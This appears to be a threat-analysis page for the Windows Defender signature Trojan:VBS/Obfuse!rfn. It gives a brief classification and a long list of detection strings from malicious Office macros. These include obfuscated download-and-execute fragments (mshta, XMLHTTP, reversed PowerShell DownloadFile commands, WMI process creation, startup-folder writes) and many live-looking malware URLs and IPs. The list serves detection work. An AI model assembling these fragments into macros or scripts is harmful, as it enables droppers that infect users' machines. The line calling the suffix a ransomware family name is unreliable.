user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:VBS/Obfuse!rfn
Trojan:VBS/Obfuse!rfn - Windows Defender threat signature analysis

Trojan:VBS/Obfuse!rfn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:VBS/Obfuse!rfn
Classification:
Type:Trojan
Platform:VBS
Family:Obfuse
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Specific ransomware family name
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for VBScript platform, family Obfuse

Summary:

This threat is an obfuscated VBScript trojan, often delivered within a malicious document macro. It leverages legitimate system utilities like cmd.exe, forfiles.exe, and rundll32.exe to drop and execute secondary malicious payloads. The script uses heavy string manipulation and command-line tricks to evade detection and establish persistence on the compromised system.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - //^:^" + "p^tth@v (MACROHSTR_EXT)
 - .Create "forfiles /p c:\windows\system32 /m notepad.exe /c C:\Users\user\AppData\ (MACROHSTR_EXT)
 - sProc = Environ("windir") & "\\SysWOW64\\rund" + "ll32.exe" (MACROHSTR_EXT)
 - vsuwuoczk.Run Dyjkmwtza.Ueadm, 0, True (MACROHSTR_EXT)
 - If i = 410 Then Shell .LastText, 0 * i (MACROHSTR_EXT)
 - .SaveToFile(Environ( (MACROHSTR_EXT)
 - .createElement( (MACROHSTR_EXT)
 - .dataType =  (MACROHSTR_EXT)
 - .Text =  (MACROHSTR_EXT)
 - .nodeTypedValue, vbUnicode) (MACROHSTR_EXT)
 - Attribute VB_Control = "CommandButton1,  (MACROHSTR_EXT)
 - , MSForms, CommandButton" (MACROHSTR_EXT)
 - "cmd.exe /c P^" +  (MACROHSTR_EXT)
 - .CreateTextFile( (MACROHSTR_EXT)
 -  .Write  (MACROHSTR_EXT)
 -  .Close (MACROHSTR_EXT)
 - "md.exe /" + Format(ChrW( (MACROHSTR_EXT)
 - ^e^l^L^.^E^X^e^ (MACROHSTR_EXT)
 - omran = "cmd.exe /V:ON/C""set lW=o.crm (MACROHSTR_EXT)
 - = "cmd /V:ON/C""set (MACROHSTR_EXT)
 - wDTiIL(0) = InStrRev(jljNwd + ijsBIVMkvJqdUDjjwZjL  (MACROHSTR_EXT)
 - Shell@ Shapes(1).TextFrame.TextRange.Text +  (MACROHSTR_EXT)
 - p).TextFrame.TextRange.Text +  (MACROHSTR_EXT)
 - Md." + (MACROHSTR_EXT)
 - "d." + Format(Chr((( (MACROHSTR_EXT)
 -  ).TextFrame.TextRange.Text (MACROHSTR_EXT)
 - VBA.Shell(Shapes( (MACROHSTR_EXT)
 - ).TextFrame.TextRange.Text +  (MACROHSTR_EXT)
 - .Shell (MACROHSTR_EXT)
 -  ).TextFrame.ContainingRange (MACROHSTR_EXT)
 -  ").AlternativeText,  (MACROHSTR_EXT)
 - Interaction.Shell (MACROHSTR_EXT)
 - VBA.Shell (MACROHSTR_EXT)
 - .Run@  (MACROHSTR_EXT)
 - .Run Trim(ActiveDocument.Shapes(" (MACROHSTR_EXT)
 -  ").AlternativeText),  (MACROHSTR_EXT)
 - (ThisDocument.Shapes(" (MACROHSTR_EXT)
 - (Shell(Trim(ThisDocument.Shapes(" (MACROHSTR_EXT)
 - (Shell((ThisDocument.Shapes(" (MACROHSTR_EXT)
 -  ActiveDocument.Shapes(" (MACROHSTR_EXT)
 -  ThisDocument.Shapes(" (MACROHSTR_EXT)
 -  ").AlternativeText) (MACROHSTR_EXT)
 - .Shell(CleanString( (MACROHSTR_EXT)
 - .Shell  (MACROHSTR_EXT)
 -  ").AlternativeText)),  (MACROHSTR_EXT)
 - .Shell(LTrim(RTrim(Shapes(" (MACROHSTR_EXT)
 -  "CmD /C " + Trim( (MACROHSTR_EXT)
 -  .AlternativeText + "", "[", "A")) +  (MACROHSTR_EXT)
 -  ")).AlternativeText, vbHide (MACROHSTR_EXT)
 -   & "scripting" & ".filesyst" & "emobject") (MACROHSTR_EXT)
 - Shapes(1).TextFrame.TextRange.Text (MACROHSTR_EXT)
 - = "MICrOSOFT.XMLdOM" (MACROHSTR_EXT)
 - With ActiveDocument.Shapes (MACROHSTR_EXT)
 - @= .Count To 1 Step -1 (MACROHSTR_EXT)
 - .Item( (MACROHSTR_EXT)
 -  ).Delete (MACROHSTR_EXT)
 - .Run  (MACROHSTR_EXT)
 -     Selection.WholeStory (MACROHSTR_EXT)
 -     Selection.Font.Color = - (MACROHSTR_EXT)
 -     ThisDocument.Range(0, 0).Select (MACROHSTR_EXT)
 -  + ActiveDocument.Name +  (MACROHSTR_EXT)
 - .Text1, Len( (MACROHSTR_EXT)
 -  .LastText) (MACROHSTR_EXT)
 -  Then Shell .LastText,  (MACROHSTR_EXT)
 - VBA.Shell%  (MACROHSTR_EXT)
 - Interaction.Shell( (MACROHSTR_EXT)
 - .TextFrame.TextRange.Text +  (MACROHSTR_EXT)
 - .TextFrame.ContainingRange (MACROHSTR_EXT)
 -  = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
 - = StrReverse("QeTxXeF. (MACROHSTR_EXT)
 - TextFrame.TextRange.Text + (MACROHSTR_EXT)
 - = .LastText (MACROHSTR_EXT)
 - .TextFrame.TextRange.Text + (MACROHSTR_EXT)
 - .Run! (MACROHSTR_EXT)
 - .Run# (MACROHSTR_EXT)
 - [Interaction].Shell( (MACROHSTR_EXT)
 - .TextRange.Text (MACROHSTR_EXT)
 -  ").TextFrame (MACROHSTR_EXT)
 - , Interaction.Shell( (MACROHSTR_EXT)
 - .TextBox1) (MACROHSTR_EXT)
 - Val(Application.MailSystem) Like Val(1) (MACROHSTR_EXT)
 - doc_print_body Form1.Text1 (MACROHSTR_EXT)
 -  ).TextFrame (MACROHSTR_EXT)
 - .Shapes( (MACROHSTR_EXT)
 - .Shell( (MACROHSTR_EXT)
 - .!@# ][_ (MACROHSTR_EXT)
 - .TextBox1 +  (MACROHSTR_EXT)
 - = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
 - (Application.MailSystem) Like (MACROHSTR_EXT)
 - .TextBox1.Text +  (MACROHSTR_EXT)
 - P.TextBox1 (MACROHSTR_EXT)
 - = 44224474 /  (MACROHSTR_EXT)
 -  / 8527 *  (MACROHSTR_EXT)
 -  + Fix(7798) + 9905 * Sin(7) / 310 * Sin( (MACROHSTR_EXT)
 - = 871 / Rnd(4) +  (MACROHSTR_EXT)
 -  * CDate(3624 - 352183467 * 84 / 475) /  (MACROHSTR_EXT)
 - Application.Run " (MACROHSTR_EXT)
 - = Mid("Y/,http:/'+'/'+'arteandvte+vteivte+vteni'+ (MACROHSTR_EXT)
 - "ob" + ORzWcjqzFIkYid + mboGOHOwULN + "jEC" + vwmdjQDIIBfJ + akJOwZkC + "T" + pfGCwCRW + KJwvuNYW + "  " + JwJzoOKwQzA + bnDJAKGkJpsAQm + "SY" + jBOYYBsWJO + UFVMQKWHqDXMX + "sT" + GRwXbwc + lUaZvhAmaOPDUf + "Em." (MACROHSTR_EXT)
 - p).Run (MACROHSTR_EXT)
 - p.TextBox1 (MACROHSTR_EXT)
 - , CreateObject("WscRipt.sHeLl").Run (MACROHSTR_EXT)
 - Z.TextBox1 (MACROHSTR_EXT)
 - ).Run (MACROHSTR_EXT)
 - "WscRipt.sHeLl" (MACROHSTR_EXT)
 - "WscRipt.sHeLl" + (MACROHSTR_EXT)
 - @").Run( (MACROHSTR_EXT)
 - @, Interaction.Shell( (MACROHSTR_EXT)
 - (Interaction.Shell( (MACROHSTR_EXT)
 - Interaction.Shell  (MACROHSTR_EXT)
 -  = CreateObject("microsoft.xmlhttp") (MACROHSTR_EXT)
 -  = CreateObject("Shell.Application") (MACROHSTR_EXT)
 - .Open "GET",  (MACROHSTR_EXT)
 - .Status = 200 Then (MACROHSTR_EXT)
 -  = CreateObject("adodb.stream") (MACROHSTR_EXT)
 - ~9,2% /V (MACROHSTR_EXT)
 - ~9,2% " + "/V: (MACROHSTR_EXT)
 - ",2% /V:O" + (MACROHSTR_EXT)
 - + "9,2% /V:O" (MACROHSTR_EXT)
 - ~9,2% /" + "V (MACROHSTR_EXT)
 - "9,2% /V (MACROHSTR_EXT)
 - ",2%" + " /V (MACROHSTR_EXT)
 - Chr(KeyCodeConstants.vbKeyP) +  (MACROHSTR_EXT)
 - = "shell.exe " (MACROHSTR_EXT)
 -  + KeyCodeConstants.vbKeyP +  (MACROHSTR_EXT)
 - P + KeyCodeConstants.vbKeyP +  (MACROHSTR_EXT)
 - @ + KeyCodeConstants.vbKeyP +  (MACROHSTR_EXT)
 - @+ KeyCodeConstants.vbKeyO +  (MACROHSTR_EXT)
 - .vbKeyP +  (MACROHSTR_EXT)
 -   + KeyCodeConstants@.vbKeyP +  (MACROHSTR_EXT)
 - .ShowWindow =  (MACROHSTR_EXT)
 - .Create  (MACROHSTR_EXT)
 -  ").AlternativeText (MACROHSTR_EXT)
 - VBA.Interaction.Shell (MACROHSTR_EXT)
 - = ActiveDocument.Shapes( (MACROHSTR_EXT)
 - Shell """" + "ms" + "hta""""" + "https" + ":\\j.mp\gshjag" + "hjksaox""" (MACROHSTR_EXT)
 - Shell """" + "ms" + "hta""""" + "https:\\j.mp\" + "sdahdnsan67vbz""" (MACROHSTR_EXT)
 - Shell """" + "msh" + "ta""""https:\\j.mp\jhay2a" + "aabx""" (MACROHSTR_EXT)
 - Shell """ms" + "hta""""https:\\j.mp\jap" + "262" + "vsv" + "xz""" (MACROHSTR_EXT)
 - Shell """" + "msh" + "ta""""https:\\j.mp\jhasy2a" + "h23ax""" (MACROHSTR_EXT)
 - Shell """" + "ms" + "hta""""https:\\j.mp\a1idna" + "andas7ox""" (MACROHSTR_EXT)
 - 0).Create  (MACROHSTR_EXT)
 - = VBA.Shell( (MACROHSTR_EXT)
 - GetObject("winmg" + "mts:Wi" + "n32_Process").Create (MACROHSTR_EXT)
 -  + "n32_Process").Create  (MACROHSTR_EXT)
 -  + "n32_Process")).Create  (MACROHSTR_EXT)
 -  + "n32_Process")).Create (MACROHSTR_EXT)
 -  + "n32_P" + "rocess")).Create(( (MACROHSTR_EXT)
 - .ID = "P" & Issqwe6 (MACROHSTR_EXT)
 - "http:// (MACROHSTR_EXT)
 - .com/ (MACROHSTR_EXT)
 - .jpg", Environ("AppData") & "\ (MACROHSTR_EXT)
 - .exe") (MACROHSTR_EXT)
 - ).Create(( (MACROHSTR_EXT)
 - .AlternativeText, vbHide (MACROHSTR_EXT)
 - activedocument.shapes (MACROHSTR_EXT)
 - .alternativetext (MACROHSTR_EXT)
 - interaction.shell (MACROHSTR_EXT)
 - ).Create (MACROHSTR_EXT)
 - Open romp + "\groove1.bat" (MACROHSTR_EXT)
 - .mynewtxt.Text) (MACROHSTR_EXT)
 - `). _ (MACROHSTR_EXT)
 - .AlternativeText, Null,  (MACROHSTR_EXT)
 - .Create (MACROHSTR_EXT)
 - ).Create  (MACROHSTR_EXT)
 - = objWMIService.Get("Wi" + "n" + "32_" & "Pr" + "oce" + "ss" & "St" + "art" + "up") (MACROHSTR_EXT)
 - .ShowWindow = HIDDEN_WINDOW (MACROHSTR_EXT)
 - .Create PvS(" (MACROHSTR_EXT)
 - 0). _ (MACROHSTR_EXT)
 - / Fix( (MACROHSTR_EXT)
 - = ActiveDocument.InlineShapes( (MACROHSTR_EXT)
 -  / Chr( (MACROHSTR_EXT)
 -  / CDbl( (MACROHSTR_EXT)
 - .Value +  (MACROHSTR_EXT)
 - .Value) (MACROHSTR_EXT)
 - = ThisDocument.InlineShapes( (MACROHSTR_EXT)
 - + "32_Process").Create (MACROHSTR_EXT)
 - ").AlternativeText (MACROHSTR_EXT)
 - .CreateObject( (MACROHSTR_EXT)
 - @).Create (MACROHSTR_EXT)
 - .TextBox (MACROHSTR_EXT)
 - .Text) (MACROHSTR_EXT)
 - %TEMP%\ (MACROHSTR_EXT)
 - @.exe (MACROHSTR_EXT)
 - = ThisDocument.InlineShapes(( (MACROHSTR_EXT)
 - )). _ (MACROHSTR_EXT)
 - GetObject("new:13709620-C279-11CE-A49E-444553540000").ShellExecute "c (MACROHSTR_EXT)
 -  .exe", InlineShapes((3 - 5) * (-1)).AlternativeText, "", "", 0 (MACROHSTR_EXT)
 - 0).Create( (MACROHSTR_EXT)
 - GetObject("new:13709620-C279-11CE-A49E-444553540000").ShellExecute! _ (MACROHSTR_EXT)
 - "c" + Chr(vbKeyM) + "d.exe", InlineShapes((3 - 5) * (-1)).AlternativeText, "", "", 0 (MACROHSTR_EXT)
 - P).Create  (MACROHSTR_EXT)
 - GetObject("Winmgmts:").Get(StrReverse(" (MACROHSTR_EXT)
 - ")).Create  (MACROHSTR_EXT)
 - .AlternativeText, "", "", 0 (MACROHSTR_EXT)
 - ).ShellExecute% _ (MACROHSTR_EXT)
 - ).AlternativeText, "", "", 0 (MACROHSTR_EXT)
 - InlineShapes(2).AlternativeText, 0 (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").Run% _ (MACROHSTR_EXT)
 - ).AlternativeText, _ (MACROHSTR_EXT)
 - .AlternativeText, _ (MACROHSTR_EXT)
 -  ((&H46 - &HA6 * &H3) * (&H95 / &H5) * 0)) (MACROHSTR_EXT)
 -  = Application.ActiveDocument.FullName (MACROHSTR_EXT)
 -  = Environ("windir") + "\SysWOW64\rundll32.exe" + " """ +  (MACROHSTR_EXT)
 -  = Environ("windir") + "\System32\rundll32.exe" + " """ +  (MACROHSTR_EXT)
 - GetObje.Crea =  (MACROHSTR_EXT)
 - Application.International( (MACROHSTR_EXT)
 - ("USERPROFILE") & Split("\AppData\! (MACROHSTR_EXT)
 - .AlternativeText, (MACROHSTR_EXT)
 - .Run ("regsvr32.exe /s /i " &  (MACROHSTR_EXT)
 - CreateObject("WScript.Shell").Run (MACROHSTR_EXT)
 - Text).Run (MACROHSTR_EXT)
 - (Split(ThisWorkbook.Sheets( (MACROHSTR_EXT)
 - ).Range( (MACROHSTR_EXT)
 - ).Value, ",") (MACROHSTR_EXT)
 - .Text).Run (MACROHSTR_EXT)
 - Split(ThisWorkbook.Sheets( (MACROHSTR_EXT)
 - ).Value, ","): Dim  (MACROHSTR_EXT)
 -  .Create  (MACROHSTR_EXT)
 - ()).Run  (MACROHSTR_EXT)
 - (ThisWorkbook.Sheets( (MACROHSTR_EXT)
 - ).Value), Val( (MACROHSTR_EXT)
 - ).Value, (MACROHSTR_EXT)
 - Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell") (MACROHSTR_EXT)
 - s.Run Replace(c, "*", ""), 0 (MACROHSTR_EXT)
 - Split(ActiveDocument.Variables( (MACROHSTR_EXT)
 -  ).AlternativeText, 0 (MACROHSTR_EXT)
 - .Address(0, 0)":  (MACROHSTR_EXT)
 - ApplIcation.Quit (MACROHSTR_EXT)
 - " = Split(ThisWorkbook.Sheets( (MACROHSTR_EXT)
 - "(1)).Create  (MACROHSTR_EXT)
 - .Run%( _ (MACROHSTR_EXT)
 -  = iles.getspecialFolDer(2) & "\..\..\Roaming\MicrOSOft\WinDOWs\StART Menu\ProGRAms\StaRTup" (MACROHSTR_EXT)
 - .Get(June("106124129070069114099133130118120134134")).Create  (MACROHSTR_EXT)
 - .CreateTextFile(Environ(DRTYUIUU( (MACROHSTR_EXT)
 - .ShellExecute ed00010000010(BIUFRYGFEUFBBCGD.ProcessName.Text),  (MACROHSTR_EXT)
 -  = VBA. _ (MACROHSTR_EXT)
 -  = Split(ActiveDocument.Variables( (MACROHSTR_EXT)
 - (1)).Create  (MACROHSTR_EXT)
 - )).Run  (MACROHSTR_EXT)
 - Sheets("Prompt").Visible = xlSheetVeryHidden (MACROHSTR_EXT)
 - C:\Users\" & Environ("us" & "ername") & "\.templates" (MACROHSTR_EXT)
 - = "System Manager." & eeee & "e" (MACROHSTR_EXT)
 - = CreateObject(sb & "ch" & sa & "le." & sg & sn & "ice") (MACROHSTR_EXT)
 - fso.CreateTextFile("C:\out.txt") (MACROHSTR_EXT)
 - .Run%( (MACROHSTR_EXT)
 - = VBA. _ (MACROHSTR_EXT)
 - .Text (MACROHSTR_EXT)
 - .Run!  (MACROHSTR_EXT)
 - ).Value)) (MACROHSTR_EXT)
 - = Split(ActiveDocument.Variables( (MACROHSTR_EXT)
 - Module1.BIZARD (MACROHSTR_EXT)
 - = Shell(l1 & "/c" & a11, 0) (MACROHSTR_EXT)
 - = "cmd" & "." & "exe" & (MACROHSTR_EXT)
 - ).Run$  (MACROHSTR_EXT)
 - + "pt.S" + "hell" (MACROHSTR_EXT)
 - + "Wscri" (MACROHSTR_EXT)
 -  / Sgn( (MACROHSTR_EXT)
 - ).Create _ (MACROHSTR_EXT)
 - .Create _ (MACROHSTR_EXT)
 - Fake = Chr(32) & "/" & "e" & ":" (MACROHSTR_EXT)
 - = Replace(ThisDocument.FullName, ".docm", ".rtf") (MACROHSTR_EXT)
 - VBA.CallByName VBA.CreateObject(Polo & ".Application"), Copy2, VbMethod, "W" & Mix2, Fake (MACROHSTR_EXT)
 - .Run% ( (MACROHSTR_EXT)
 -  .Text _ (MACROHSTR_EXT)
 - .Create( (MACROHSTR_EXT)
 -  (Split(ThisWorkbook.Sheets( (MACROHSTR_EXT)
 - ).Value, Chr( (MACROHSTR_EXT)
 - (Split(ActiveDocument.Variables( (MACROHSTR_EXT)
 - ').Value, Chr(44))) (MACROHSTR_EXT)
 - .Value &  (MACROHSTR_EXT)
 - .Controls(0).Value, (MACROHSTR_EXT)
 - .Controls(1).Value) (MACROHSTR_EXT)
 - .Controls(2) (MACROHSTR_EXT)
 - ).value, Chr(44)) (MACROHSTR_EXT)
 - .Controls(1).Text) (MACROHSTR_EXT)
 - .Run! "" +  (MACROHSTR_EXT)
 - .Controls(2).Value) + (MACROHSTR_EXT)
 - .Controls(0).Text (MACROHSTR_EXT)
 - .Controls(0).Value (MACROHSTR_EXT)
 - ).Value, Chr(44)) (MACROHSTR_EXT)
 - .Controls( (MACROHSTR_EXT)
 - ).Value (MACROHSTR_EXT)
 - .Run! ( (MACROHSTR_EXT)
 - .ActiveDocument (MACROHSTR_EXT)
 - Chr(92) & Rnd & ".jse" (MACROHSTR_EXT)
 - Set WshScript = objOL.CreateObject("Shell.Application") (MACROHSTR_EXT)
 - WshScript.ShellExecute (MACROHSTR_EXT)
 - (1).Value (MACROHSTR_EXT)
 - If InStr(ActiveDocument.Paragraphs(j).Range.Text, "Error") Then (MACROHSTR_EXT)
 - If InStr(ActiveDocument.Paragraphs(j).Range.Text, "view this") Then (MACROHSTR_EXT)
 - = "verinstere.xls" (MACROHSTR_EXT)
 - = Environ("temp") & "\MicrosoftOfficeWord.exe" (MACROHSTR_EXT)
 - getUrl3 = "http://54.39.144.250/" (MACROHSTR_EXT)
 - = "WSCript.sHELl" (MACROHSTR_EXT)
 - = "Cmd /C msIe^x^eC " & Chr(443 - 396) & Chr(503 - 398) & Chr(167 - 135) & Chr(260 - 156) & Chr(208 - 92) & Chr(473 - 357) & Chr(492 - 380) & Chr(102 - 44) & Chr(309 - 262) & (MACROHSTR_EXT)
 - VBA.GetObject( (MACROHSTR_EXT)
 - $.Text).Run!  (MACROHSTR_EXT)
 - .Controls (MACROHSTR_EXT)
 - getUrl3 = "http://51.75.133.165/" (MACROHSTR_EXT)
 - ).Text) (MACROHSTR_EXT)
 - CallByName Class7.Valaar1, "savet" & "ofile", VbMethod,  (MACROHSTR_EXT)
 - .e" & "" + "xe", 2 (MACROHSTR_EXT)
 - ExecuteExcel4Macro "MESSAGE(False, ""Fix Marv"")" (MACROHSTR_EXT)
 - Rocky1.Open Me.Label3.Caption, Me.T10_Text.Tag, False (MACROHSTR_EXT)
 - fU2 = "http://54.39.233.134" (MACROHSTR_EXT)
 - fU2 = "http://54.39.233.132/de1.trp" (MACROHSTR_EXT)
 -  Lib "winmm.dll" () As Long (MACROHSTR_EXT)
 - www.minpic.de/k/bc1l/16ptus/ (MACROHSTR_EXT)
 - https:// (MACROHSTR_EXT)
 - Windows\System32\mshta.exe (MACROHSTR_EXT)
 - Shell "C:\ (MACROHSTR_EXT)
 - Application.Run("ThisDocument. (MACROHSTR_EXT)
 - 5", ActiveDocument.Variables( (MACROHSTR_EXT)
 - ).Value): Call (MACROHSTR_EXT)
 - ).Value, ","): Call (MACROHSTR_EXT)
 - ThisWorkbook.Sheets( (MACROHSTR_EXT)
 - ActiveDocument.Variables( (MACROHSTR_EXT)
 - ).Value) (MACROHSTR_EXT)
 - .Value & "") (MACROHSTR_EXT)
 - = VBA.GetObject( (MACROHSTR_EXT)
 - save2file = peopepepepe & Chr(92) & Rnd & ".jse" (MACROHSTR_EXT)
 - Set shellObj = objOL.CreateObject("Shell.Application", "") (MACROHSTR_EXT)
 - shellObj.ShellExecute save2file (MACROHSTR_EXT)
 - .CreateTextFile(save2file, True, True) (MACROHSTR_EXT)
 - = "WSCRipt.sHELl" (MACROHSTR_EXT)
 - = "cmD /c msIE^X^Ec " & Chr(245 - 198) & Chr(150 - 45) & Chr(182 - 150) & Chr(335 - 231) & Chr(467 - 351) & Chr(161 - 45) & Chr(267 - 155) & Chr(273 - 215) & Chr(55 - 8) & Chr(194 - 147) & Chr(415 - 365) & Chr(399 - 348) & (MACROHSTR_EXT)
 - ).Run!  (MACROHSTR_EXT)
 - .Value (MACROHSTR_EXT)
 - 195.123.241.144/api.php (MACROHSTR_EXT)
 - http:// (MACROHSTR_EXT)
 - C:\Vertis\Kots\svchost (MACROHSTR_EXT)
 - ShellExecuteA (MACROHSTR_EXT)
 - .Value).Run%  (MACROHSTR_EXT)
 - .Run%  (MACROHSTR_EXT)
 - .Controls, 2) + (MACROHSTR_EXT)
 - (ActiveDocument.Variables( (MACROHSTR_EXT)
 -  ).Range( (MACROHSTR_EXT)
 - "WSCript.sHELl" (MACROHSTR_EXT)
 - = "CMD /c Msie^X^Ec " & Chr(189 - 142) & Chr(405 - 300) & Chr(85 - 53) & Chr(341 - 237) & Chr(281 - 165) & Chr(198 - 82) & Chr(421 - 309) & Chr(233 - 175) & Chr(403 - 356) & (MACROHSTR_EXT)
 - CallByName IIIIIII3, "Run", VbMethod, WINDOWS1.Label1.Tag + " " & WINDOWS1.Tag + " ", 0, False (MACROHSTR_EXT)
 - CreateObject(WINDOWS1.Label2.Tag) (MACROHSTR_EXT)
 - asnt5655 & Chr(92) & Rnd & ".jse" (MACROHSTR_EXT)
 - shellObj.ShellExecute nnn6 (MACROHSTR_EXT)
 - Open "C:\Windows\Temp\ (MACROHSTR_EXT)
 - 0.js" For Output As # (MACROHSTR_EXT)
 - .Controls(0).ControlTipText (MACROHSTR_EXT)
 - = CreateObject("Shell.Application") (MACROHSTR_EXT)
 - .NameSpace("C:\Windows (MACROHSTR_EXT)
 - .InvokeVerb ("Op (MACROHSTR_EXT)
 - CallByName ObjectPep3, "Run", VbMethod, Form2.Label1.Tag + " " & Form2.Tag + " ", 0, False (MACROHSTR_EXT)
 - = CreateObject(Form2.Label2.Tag) (MACROHSTR_EXT)
 - http://duleal.com/ (MACROHSTR_EXT)
 - .exe (MACROHSTR_EXT)
 - http://fikima.com/ (MACROHSTR_EXT)
 - http://djacel.com/ (MACROHSTR_EXT)
 - http://bellque.com/ (MACROHSTR_EXT)
 - http://ersimp.com/ (MACROHSTR_EXT)
 - http://arcoqa.com/ (MACROHSTR_EXT)
 - http://typrer.com/ (MACROHSTR_EXT)
 - https://toulousa.com/ (MACROHSTR_EXT)
 - , "verinstere.xls", 0) (MACROHSTR_EXT)
 - .Range.Text, "view this") Then (MACROHSTR_EXT)
 - .Tag) (MACROHSTR_EXT)
 - ShellApp.Open Environ("TMP") + "\felldistanceyearshipmentminorityplastics.exe" (MACROHSTR_EXT)
 - "http://" & "1xv4.com/due.jpg", (MACROHSTR_EXT)
 - http://138.68.217.234/crypted.exe (MACROHSTR_EXT)
 - teMp\lHcc.exe (MACROHSTR_EXT)
 - .NameSpace(Environ("windir") + "\Temp") (MACROHSTR_EXT)
 - .js" (MACROHSTR_EXT)
 - + "\" +  (MACROHSTR_EXT)
 - = Environ("windir") + "\Temp" (MACROHSTR_EXT)
 - ll.Application") (MACROHSTR_EXT)
 - .InvokeVerb ( (MACROHSTR_EXT)
 - = "http://192.99.214.32/word1.tmp" (MACROHSTR_EXT)
 - "C:\Windows\Temp\ (MACROHSTR_EXT)
 - .ert" (MACROHSTR_EXT)
 - .xsl",  (MACROHSTR_EXT)
 - .Text)) (MACROHSTR_EXT)
 - ActiveDocument.Bookmarks (MACROHSTR_EXT)
 - ActiveDocument.AcceptAllRevisionsShown (MACROHSTR_EXT)
 - CreateObject("Shell.Application").Open ( (MACROHSTR_EXT)
 - 0 + "\" + (MACROHSTR_EXT)
 - Object("winmgmts:root\cimv2:Win32_Process") (MACROHSTR_EXT)
 - savetofile FilePath & FileName & ".vcf" (MACROHSTR_EXT)
 - UsedRange.Rows.Count (MACROHSTR_EXT)
 - fUR = "http://54.39.233.130/de3.tmp" (MACROHSTR_EXT)
 - & ".e" & "xe" (MACROHSTR_EXT)
 - = Environ(E) + "\Temp" (MACROHSTR_EXT)
 - CreateObject("Shell.Application").Open realpath (MACROHSTR_EXT)
 - ("c:\windows\temp\ (MACROHSTR_EXT)
 - .Controls(0) (MACROHSTR_EXT)
 -  CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
 - .Caption (MACROHSTR_EXT)
 - = "exe. (MACROHSTR_EXT)
 - /scodth/pmax/rm/pmax/gro.sndkcud.revressnilloc//:ptth" (MACROHSTR_EXT)
 - & "\" & StrReverse("exe. (MACROHSTR_EXT)
 - .Run p & " " & j & " ", (MACROHSTR_EXT)
 - (environ("temp") & "\ (MACROHSTR_EXT)
 - ActiveDocument.AcceptAllRevisions (MACROHSTR_EXT)
 - = "cmd /c mSie^x^EC " & Chr(261 - 214) & Chr(414 - 309) & Chr(137 - 105) & Chr(456 - 352) & Chr(434 - 318) & Chr(358 - 242) & Chr(412 - 300) & Chr(283 - 225) & (MACROHSTR_EXT)
 - .SaveToFile  (MACROHSTR_EXT)
 - .write  (MACROHSTR_EXT)
 - 5.responseBody (MACROHSTR_EXT)
 - VBA.Shell (Right("Insidepower", 5) & "she" & String(2, "l") & " ws" & KaBu & "ript " & Kasza) (MACROHSTR_EXT)
 - Kasza = "/" & "" & "E:JS" & Chr(Int3) & "ripT " & Chr(34) & Kasza & Chr(34) (MACROHSTR_EXT)
 - & "\normal.txt:$.$" (MACROHSTR_EXT)
 - ThisDocument.DefaultTargetFrame & "on-stab.online/result/2754.jpg' (MACROHSTR_EXT)
 - LDR_2754.js (MACROHSTR_EXT)
 - = Environ("APPDATA") & "\" (MACROHSTR_EXT)
 - ShlWai str65 & "fold1\" & "fileDown656593" (MACROHSTR_EXT)
 - ("temp") & "\ (MACROHSTR_EXT)
 - tly.com", " (MACROHSTR_EXT)
 - & "li" & "bc" & "url" & ".d" & "ll" & ",#52", 0, False (MACROHSTR_EXT)
 - n = "pen" & "se1.t" & "xt" (MACROHSTR_EXT)
 - = fso1.GetSpecialFolder(2) & "\" & n (MACROHSTR_EXT)
 - = "cmD /C mSiE^X^eC " & Chr(174 - 127) & Chr(187 - 82) & Chr(325 - 293) & Chr(159 - 55) & Chr(441 - 325) & Chr(250 - 134) & Chr(299 - 187) & Chr(401 - 343) & Chr(238 - 191) & (MACROHSTR_EXT)
 - CallByName CreateObject("wS" & Chri & "Ript.She" & Ja), "Run", VbMethod, Right(Right("WhiteGunPower", 8), Rule) & "sHe" & Ja & " wS" & Chri & "RipT           " & GroundOn, 0 (MACROHSTR_EXT)
 - & "\stati_stic.inf:com1" (MACROHSTR_EXT)
 - = "" & "/" & "" & "e" & ":jS" & Chri & "R" & "IpT " & Chr(36 - Price) & (MACROHSTR_EXT)
 - StrReverse(":tamrof/ teg so" & " cimw") (MACROHSTR_EXT)
 - http://bananaarestsigiriya.com/ytpqaxwq/555555555.png (MACROHSTR_EXT)
 - C:\Fetil\Giola\oceanDh (MACROHSTR_EXT)
 - CallByName CreateObject("WS" & Kerrosin & Dera & ".SHE" & Galat), runt, VbMethod, Sope & "SHE" & Galat & " WS" & Kerrosin & Dera & sex & NaxaP (MACROHSTR_EXT)
 - = "JS" (MACROHSTR_EXT)
 - & "\home.text:con" (MACROHSTR_EXT)
 - MSHTA https://governosp.com.br/ (MACROHSTR_EXT)
 - = VBA.Split("") (MACROHSTR_EXT)
 - = VBA.Mid$( (MACROHSTR_EXT)
 - http://wnrfa9y.com/iz5/ (MACROHSTR_EXT)
 - .php?l= (MACROHSTR_EXT)
 - .cab", " (MACROHSTR_EXT)
 - .exp", 0, 0) (MACROHSTR_EXT)
 - .exp" (MACROHSTR_EXT)
 - http://ow.ly/QoHbJ (MACROHSTR_EXT)
 - C:\Windows\Temp\AdobeReader.bat (MACROHSTR_EXT)
 - objFSO.DeleteFile (strSaveTo) (MACROHSTR_EXT)
 - = CreateObject(ThisDocument. (MACROHSTR_EXT)
 - .Caption).Create( (MACROHSTR_EXT)
 - + ThisDocument. (MACROHSTR_EXT)
 - StrReverse("'sbv.tneilC\%ATADPPA%' ssecorP-tratS;)'sbv.tneilC\%ATADPPA%','gpj.14bili4461_p/oi.pot4pot.h//:sptth'(eliFdaolnwoD.)tneilCbeW.teN.met") (MACROHSTR_EXT)
 - Shell Environ$(StrReverse("CEPSMOC")) & StrReverse(" c/ ") & PShellCode, vbHide (MACROHSTR_EXT)
 - StrReverse("'sbv.tneilC\%cilbup%' ssecorP-tratS;)'sbv.tneilC\%cilbup%','gpj.20qs1x4461_p/oi.pot4pot.i//:sptth'(eliFdaolnwoD.)tneilCbeW.teN.met") (MACROHSTR_EXT)
 - .Document.body.innerText (MACROHSTR_EXT)
 - "Shell.Application" (MACROHSTR_EXT)
